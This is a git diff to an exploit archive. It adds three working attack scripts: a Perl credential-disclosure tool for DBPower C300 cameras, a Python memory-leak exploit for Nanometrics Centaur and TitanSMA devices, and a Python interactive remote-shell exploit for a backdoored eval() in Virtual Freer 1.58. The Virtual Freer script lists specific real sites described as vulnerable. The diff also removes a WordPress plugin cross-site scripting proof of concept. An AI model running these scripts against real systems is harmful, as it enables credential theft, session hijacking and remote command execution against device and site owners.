diff --git a/exploits/hardware/webapps/48095.pl b/exploits/hardware/webapps/48095.pl new file mode 100755 index 000000000..0825ae713 --- /dev/null +++ b/exploits/hardware/webapps/48095.pl @@ -0,0 +1,89 @@ +# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure +# Date: 2020-02-19 +# Author: Todor Donev +# Vendor: https://donev.eu/ +# CVE: N/A +# Copyright 2020 (c) Todor Donev +# +# https://donev.eu/ +# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities +# +# Disclaimer: +# This or previous programs are for Educational purpose ONLY. Do not use it without permission. +# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages +# caused by direct or indirect use of the information or functionality provided by these programs. +# The author or any Internet provider bears NO responsibility for content or misuse of these programs +# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, +# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's +# responsibility. +# +# Use them at your own risk! +# +# (Dont do anything without permissions) +# +# +# [ DBPower C300 HD Camera Remote Configuration Disclosure +# [ ========================================================== +# [ Exploit Author: Todor Donev 2020 +# [ Initializing the browser +# [ >> User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112 +# [ >> Content-Type => application/x-www-form-urlencoded +# [ << Connection => close +# [ << Date => +# [ << Accept-Ranges => bytes +# [ << Server => thttpd/2.25b 29dec2003 +# [ << Content-Length => 25730 +# [ << Content-Type => application/octet-stream +# [ << Last-Modified => +# [ << Client-Date => +# [ << Client-Peer => 192.168.1.103:8080 +# [ << Client-Response-Num => 1 +# [ +# [ Username : admin +# [ Password : admin +# +#!/usr/bin/perl + +use strict; +use HTTP::Request; +use LWP::UserAgent; +use WWW::UserAgent::Random; +use Gzip::Faster 'gunzip'; + +my $host = shift || ''; # Full path url to the store +my $cmd = shift || ''; # show - Show configuration dump +$host =~ s/\/$//; +print "\033[2J"; #clear the screen +print "\033[0;0H"; #jump to 0,0 +print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n"; +print "[ ==========================================================\n"; +print "[ Exploit Author: Todor Donev 2020 \n"; +if ($host !~ m/^http/){ + print "[ Usage, Password Disclosure: perl $0 https://target:port/\n"; + print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n"; + exit; +} +print "[ Initializing the browser\n"; +my $user_agent = rand_ua("browsers"); +my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); + $browser->timeout(30); + $browser->agent($user_agent); +# my $target = $host."/tmpfs/config_backup.bin"; +my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69"; +my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]); +my $response = $browser->request($request) or die "[ Exploit Failed: $!"; +print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names; +print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names; +print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200); +my $gzipped = $response->content(); +my $config = gunzip($gzipped); +print "[ \n"; +if ($cmd =~ /show/) { + print "[ >> Configuration dump...\n[\n"; + print "[ ", $_, "\n" for split(/\n/,$config); + exit; +} else { + print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/); + print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/); + exit; +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48098.py b/exploits/hardware/webapps/48098.py new file mode 100755 index 000000000..39b9c2999 --- /dev/null +++ b/exploits/hardware/webapps/48098.py @@ -0,0 +1,207 @@ +# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak +# Date: 2020-02-15 +# Author: byteGoblin +# Vendor: https://www.nanometrics.ca +# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma +# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder +# CVE: N/A +# +# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit +# +# +# Vendor: Nanometrics Inc. +# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma +# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder +# +# Affected versions: +# Centaur <= 4.3.23 +# TitanSMA <= 4.2.20 +# +# Summary: +# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists +# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. +# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and +# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for +# infrasound and similar geophysical sensor recording applications requiring sample rates up to +# 5000 sps. +# +# Summary: +# The TitanSMA is a strong motion accelerograph designed for high precision observational and +# structural engineering applications, where scientists and engineers require exceptional dynamic +# range over a wide frequency band. +# +# Description: +# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect +# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) +# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. +# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. +# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP +# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system +# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent +# packet) which can be combined to leak sensitive data which can be used to perform session hijacking +# and authentication bypass scenarios. +# +# Tested on: +# Jetty 9.4.z-SNAPSHOT +# +# Vulnerability discovered by: +# byteGoblin @ zeroscience.mk +# +# +# Advisory ID: ZSL-2020-5562 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php +# +# Related CVE: CVE-2015-2080 +# Related CWE: CWE-532, CWE-538 +# +# 10.02.2020 +# + +#!/usr/bin/env python3 + +import requests +import re +import sys + +class Goblin: + def __init__(self): + self.host = None + self.page = "/zsl" + self.syslog = "/logs/syslog" + self.buffer_pad = "A" * 70 + self.buffer = None + self.payload = "\xFF" + self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results + self.body = {} + self.headers = None + self.syslog_data = {} + self.last_line = None + self.before_last_line = True + + def banner(self): + goblin = """ + NN + NkllON + 0;;::k000XN KxllokN + 0;,:,;;;;:ldK Kdccc::oK + Nx,';codddl:::dkdc:c:;lON + klc:clloooooooc,.':lc;'lX + x;:ooololccllc:,:ll:,:xX + Kd:cllc'..';:ccclc,.x _ . ___ _ . + NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __ + Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `. + 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | + 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / | + Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/ + Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// + XxclkXk;'::,,,''';:::;'''...'',:o0 + Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin + O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin zeroscience.mk + Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K + d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca + Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA + d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 + 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK + 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A + 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php + :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 + x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product + Xx:,'':xk:..,''lK Y k;';;';xX + XOkkko'.....'O d.';;,,:xN + 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ + XOkkkkkON + """ + print(goblin) + + def generate_payload(self, amount_of_bytes): + self.payload += "\x00" * amount_of_bytes + self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload} + + def read_syslog(self, initial=False): + # Read syslog remotely and filter out 'HeapByteBuffer' messages. + # 'initial' is used to make a 'snapshot' of the state before we send payloads... + # That way we can filter on what we've just sent. + print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog)) + buffer = "" + r = requests.get(self.host + self.syslog) + if r.status_code == 200: + print("[!] - We got syslog, it is: {} bytes".format(len(r.content))) + split = r.text.split("\n") + for line in split: + if "HeapByteBuffer" in line: + if initial: + self.last_line = line + else: + if line == self.last_line: + self.before_last_line = False + if not self.before_last_line: + buffer_addr = re.search("\@\w+", line).group(0).strip("@") + try: + leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>") + buffer += leak + except Exception as e: + print(e) + if initial: + return self.last_line + self.buffer = buffer + else: # we can't access syslog? + print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...") + print("[!!!] - The status code we got was: {}".format(r.status_code)) + exit(-1) + + def show_output(self): + # we need to translate '\r\n' into actual newlines + if self.buffer is not None and self.buffer is not "": + self.buffer = self.buffer.replace("\\n", "\n") + self.buffer = self.buffer.replace("\\r", "\r") + self.buffer = self.buffer.replace("%2f", "/") + + print("[*] BUFFER LENGTH: {}".format(len(self.buffer))) + print("=" * 50) + print("[*] THIS IS THE LOOT") + print("=" * 50) + for num, x in enumerate(self.buffer.split("\n")): + print("{}.\t| \t{}".format(num, x)) + + def send_payload(self, amount): + print("[!] - Sending payloads to target: {}{}".format(self.host, self.page)) + if amount > self.payloads_to_send or amount < 0: + amount = self.payloads_to_send + for num, x in enumerate(range(0, amount)): + if num % 10 == 0: + print("[!] - [{}/{}] payloads sent...".format(num, amount)) + try: + self.generate_payload(17) + r = requests.post(self.host + self.page, data=self.body, headers=self.headers) + except Exception as e: + print(e) + print("[!] - [{}/{}] payloads sent...".format(amount, amount)) + + def parse_sys_args(self): + if len(sys.argv) >= 2: + self.host = sys.argv[1] + if not "http" in self.host: + self.host = "http://{}".format(self.host) + if len(sys.argv) == 3: + # amount of packets to send + self.payloads_to_send = sys.argv[2] + else: + self.print_help() + + def print_help(self): + print("Usage: {} [amount of payloads to send]".format(sys.argv[0])) + print("Example: centaur3.py 123.456.789.0:8080 200") + print("\tThis will send 200 payloads to the aforementioned host") + print("\tThe [port] and [amount of payloads] are optional") + exit(-1) + + def main(self): + self.parse_sys_args() + self.banner() + ll = self.read_syslog(initial=True) + self.send_payload(70) + self.read_syslog() + self.show_output() + +if __name__ == '__main__': + Goblin().main() \ No newline at end of file diff --git a/exploits/php/webapps/48093.txt b/exploits/php/webapps/48093.txt deleted file mode 100644 index f934098f0..000000000 --- a/exploits/php/webapps/48093.txt +++ /dev/null @@ -1,31 +0,0 @@ -# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting -# Dork:N/A -# Date: 2020-02-17 -# Exploit Author: UltraSecurityTeam -# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar -# Vendor Homepage: UltraSec.Org -# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip -# Tested on: Windows/Linux -# Version: 1.6.2 - - - -.:: Plugin Description ::. -An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts - - -.:: Proof Of Concept (PoC) ::. - -Step 1 - Open WordPress Setting -Step 2 - Open Wp Sitemap Page -Step 3 - Inject Your Java Script Codes to Exclude pages -Step 4 - Click Button Save Changes -Step 5 - Run Your Payload - - -.:: Tested Payload ::. -'>"> - - -.:: Post Request ::. -option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes \ No newline at end of file diff --git a/exploits/php/webapps/48094.py b/exploits/php/webapps/48094.py new file mode 100755 index 000000000..8759bbe3b --- /dev/null +++ b/exploits/php/webapps/48094.py @@ -0,0 +1,113 @@ +# Exploit title : Virtual Freer 1.58 - Remote Command Execution +# Exploit Author : SajjadBnd +# Date : 2020-02-17 +# Vendor Homepage : http://freer.ir/virtual/ +# Software Link : http://www.freer.ir/virtual/download.php?action=get +# Software Link(mirror) : http://dl.nuller.ir/virtual_freer_v1.58[NuLLeR.iR].zip +# Tested on : Ubuntu 19.10 +# Version : 1.58 +############################ +# [ DESCRIPTION ] +# +# Free Script For Sell Charging Cards and Virtual Products +# +# [POC] +# +# Vulnerable file: /include/libs/nusoap.php +# 943: eval($_POST['a74ad8dfacd4f985eb3977517615ce25']); +# +# POST /include/libs/nusoap.php +# payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a'); +# +# [ Sample Vulnerable Sites ] +# +# http://3cure.ir/buy/ +# http://cheapcharger.ir/ +# http://www.appraworld.ir/ +# http://latoon.ir/ +# http://novinv.ir/ +# + +import requests +import os +import sys + +def clear(): + linux = 'clear' + windows = 'cls' + os.system([linux, windows][os.name == 'nt']) + +def Banner(): + print ''' +################################################# +# # +# Virtual Freer 1.58 - Remote Command Execution # +# SajjadBnd # +# BiskooitPedar # +# blackwolf@post.com # +################################################# +''' + +def inputs(): + target = raw_input('[*] URL : ') + while True: + try: + r = requests.get(target,verify=False) + start(target) + except requests.exceptions.MissingSchema: + target = "http://" + target + +def start(target): + print "======================\n\n[!] Checking: ****()" + url = '%s/include/libs/nusoap.php' % (target) + body = {'a74ad8dfacd4f985eb3977517615ce25':'echo vulnerable;'} + r = requests.post(url,data=body,allow_redirects=False,timeout=50) + content = r.text.encode('utf-8') + if 'vulnerable' in content: + print "[+] vulnerable: ****()\n" + else: + print "[-] Target not Vulnerable!" + sys.exit(1) + print "\n[!] Checking: System()" + body = {'a74ad8dfacd4f985eb3977517615ce25':'system(id);'} + r = requests.post(url,data=body,allow_redirects=False,timeout=50) + content = r.text.decode('utf-8') + if 'gid' in content: + print "[+] vulnerable: system()\n" + osshell(url) + else: + print "[-] Target not Vulnerable to Running OS Commands!" + evalshell(url) + +def osshell(url): + print "======================\n[+] You can run os commands :D\n" + while True: + try: + cmd = raw_input('OS_SHELL $ ') + command = "system('%s');" % (cmd) + body = {'a74ad8dfacd4f985eb3977517615ce25':command} + r = requests.post(url,data=body,allow_redirects=False,timeout=50) + content = r.text.encode('utf-8') + print "\n",content + except KeyboardInterrupt: + print "\n____________________\n[+] GoodBye :D" + sys.exit(1) + +def evalshell(url): + print "======================\n[+] You can just run Eval Commands :D\n" + while True: + try: + cmd = raw_input('\nEval()=> ') + command = '%s;' % (cmd) + body = {'a74ad8dfacd4f985eb3977517615ce25':command} + r = requests.post(url,data=body,allow_redirects=False,timeout=50) + content = r.text.encode('utf-8') + print "\n",content + except KeyboardInterrupt: + print "\n____________________\n[+] ok! GoodBye :D" + sys.exit(1) + +if __name__ == '__main__': + clear() + Banner() + inputs() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9aee733ee..d85c81a3f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42373,4 +42373,6 @@ id,file,description,date,author,type,platform,port 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php, 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php, 48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java, -48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php, +48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php, +48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware, +48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,